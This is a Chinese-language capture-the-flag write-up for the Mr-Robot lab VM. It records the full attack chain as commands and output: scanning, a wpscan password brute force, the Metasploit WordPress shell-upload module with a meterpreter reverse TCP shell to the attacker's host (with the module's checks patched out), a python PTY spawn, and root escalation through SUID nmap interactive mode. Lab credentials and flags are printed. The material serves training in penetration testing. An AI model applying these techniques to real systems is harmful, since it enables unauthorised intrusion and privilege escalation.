[Write-up]Mr-Robot
关于
信息收集
- 用的是Host-only,所以网卡是vmnet1,IP一直是192.168.7.1/24
nmap -T4 192.168.7.1/24 -A
:~$ nmap -T4 192.168.7.1/24 -A Nmap scan report for 192.168.7.129 Host is up (0.00075s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds :~$ curl http://192.168.7.129/robots.txt User-agent: * fsocity.dic key-1-of-3.txt
- 发现第一个Key【073403c8a58a1f80d943455fb30724b9】,外加一个字典,下载字典到本地。
- 字典很大,可能有重复的,先优化一下。
sort fsocity.dic | uniq > list.dic nikto -h http://192.168.7.129
:~/桌面$ nikto -h http://192.168.7.129 - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 192.168.7.129 + Target Hostname: 192.168.7.129 + Target Port: 80 + Start Time: 2018-06-19 20:37:10 (GMT8) --------------------------------------------------------------------------- + Server: Apache + IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3". + Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN + Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523 + Retrieved x-powered-by header: PHP/5.5.29 + Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad + "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd). + OSVDB-3092: /admin/: This might be interesting... + Uncommon header 'tcn' found, with contents: choice + OSVDB-3092: /readme: This might be interesting... + Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink + OSVDB-3092: /license.txt: License file found may identify site software. + /admin/index.html: Admin login page/section found. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login/: Admin login page/section found. + /wordpress/: A Wordpress installation was found. + 6544 items checked: 0 error(s) and 16 item(s) reported on remote host + End Time: 2018-06-19 20:39:38 (GMT8) (148 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
- 通过nikto简单扫描或者用dirsearch扫一下目录
:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200 [20:42:35] 301 - 235B - /admin -> http://192.168.7.129/admin/ [20:42:36] 200 - 1KB - /admin/ [20:42:36] 200 - 1KB - /admin/?/login [20:42:38] 200 - 1KB - /admin/index [20:42:38] 200 - 1KB - /admin/index.html [20:42:41] 301 - 0B - /admin_area/index.php -> http://192.168.7.129/admin_area/ [20:43:15] 200 - 0B - /favicon.ico [20:43:23] 200 - 1KB - /index.html [20:43:25] 200 - 504KB - /intro [20:43:28] 200 - 309B - /license.txt [20:43:50] 200 - 64B - /readme [20:43:50] 200 - 64B - /readme.html [20:43:51] 200 - 41B - /robots.txt [20:43:56] 200 - 0B - /sitemap [20:43:56] 200 - 0B - /sitemap.xml [20:43:56] 200 - 0B - /sitemap.xml.gz [20:44:12] 200 - 0B - /wp-content/ [20:44:12] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php [20:44:12] 200 - 3KB - /wp-login [20:44:12] 200 - 3KB - /wp-login.php [20:44:12] 200 - 3KB - /wp-login/
- 明显是一个WordPress,但是没有看到有用户发文章。打开登录页面枚举用户名,百度Mr.Robot发现黑客军团的主角叫
Elliot,现在他提示密码错误了,说明用户名是对的。然后用刚刚发现的字典爆破。 wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
[+] Enumerating plugins from passive detection ... [+] No plugins found passively [+] Starting the password brute forcer [+] [SUCCESS] Login : Elliot Password : ER28-0652 Brute Forcing 'Elliot' Time: 00:01:21 <============================================================= > (5637 / 11452) 49.22% ETA: 00:01:24 +----+--------+------+-----------+ | ID | Login | Name | Password | +----+--------+------+-----------+ | | Elliot | | ER28-0652 | +----+--------+------+-----------+ [+] Finished: Tue Jun 19 21:22:23 2018 [+] Elapsed time: 00:01:22 [+] Requests made: 5703 [+] Memory used: 32.516 MB
GetShell
- 第一种就是以前的登录改主题404模板
- 第二种要用到Metasploit,看自己喜欢。一个大坑!
msf > use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD ER28-0652 yes The WordPress password to authenticate with PAYLOAD_NAME Kali-Team yes Fix By Kali-Team payload_name to update with PLUGIN_NAME WordPress yes Fix By Kali-Team plugin_name to update with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.7.129 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME Elliot yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.7.1 yes The listen address (an interface may be specified) LPORT 7788 yes The listen port Exploit target: Id Name -- ---- 0 WordPress msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652 password => ER28-0652 msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot username => Elliot msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129 rhost => 192.168.7.129 msf exploit(unix/webapp/wp_admin_shell_upload) > run [*] Started reverse TCP handler on 192.168.7.1:4444 [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress [*] Exploit completed, but no session was created.
报错了,Google修复,可以上传,但是反弹不会来插件的路径。
/opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
用#注释掉下面两行
fail_with(Failure::NotFound, ‘The target does not appear to be using WordPress‘) unless wordpress_and_online?
fail_with(Failure::UnexpectedReply, ‘Failed to upload the payload‘) unless uploaded
再重新载入模块
msf exploit(unix/webapp/wp_admin_shell_upload) > reload [*] Reloading module... msf exploit(unix/webapp/wp_admin_shell_upload) > run [*] Started reverse TCP handler on 192.168.7.1:7788 [*] Authenticating with WordPress using Elliot:ER28-0652... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php... [*] Sending stage (37775 bytes) to 192.168.7.129 [*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800 ls [!] This exploit may require manual cleanup of 'Kali-Team.php' on the target [!] This exploit may require manual cleanup of 'WordPress.php' on the target [!] This exploit may require manual cleanup of '../WordPress' on the target
提权
- 在robot用户的目录下找到了第二个Key,但是没权限查看。
meterpreter > ls Listing: /home/robot ==================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100400/r-------- 33 fil 2015-11-13 15:28:21 +0800 key-2-of-3.txt 100644/rw-r--r-- 39 fil 2015-11-13 15:28:21 +0800 password.raw-md5 meterpreter > cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
- 把MD5破解出来,应该就是robot的密码了。
- 但是su在反弹回来的shell中执行不了。
su: must be run from a terminal - 转py可以进入交互模式
python -c ‘import pty;pty.spawn("/bin/bash")‘
python -c 'import pty;pty.spawn("/bin/bash")'
:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959- 第二个Key找到了!
- 最后提升到root权限,找开启了SUID权限的应用
:/$ cd /root cd /root bash: cd: /root: Permission denied :/$ find / -perm -4000 -type f 2>/dev/null find / -perm -4000 -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown :/$
- 低版本的nmap可以用交互模式,而且上面说的是root权限。!后面接着命令就可以了。
:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
:/$
:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for helpnmap> !id !id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) waiting to reap child : No child processes nmap> Unknown command (ls) -- press h <enter> for help nmap/> !ls !ls bin dev home lib lost+found mnt proc run srv tmp var boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz waiting to reap child : No child processes nmap> !ls /root !ls /root firstboot_done key-3-of-3.txt waiting to reap child : No child processes nmap> cat /root/key-3-of-3.txt cat /root/key-3-of-3.txt Unknown command (cat) -- press h <enter> for help nmap> !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes nmap>
彩蛋
- 其实账号密码别人已经给你了
http://192.168.7.129/license.txt - 拿到
ZWxsaW90OkVSMjgtMDY1Mgo= - base64解一下
echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode - elliot:ER28-0652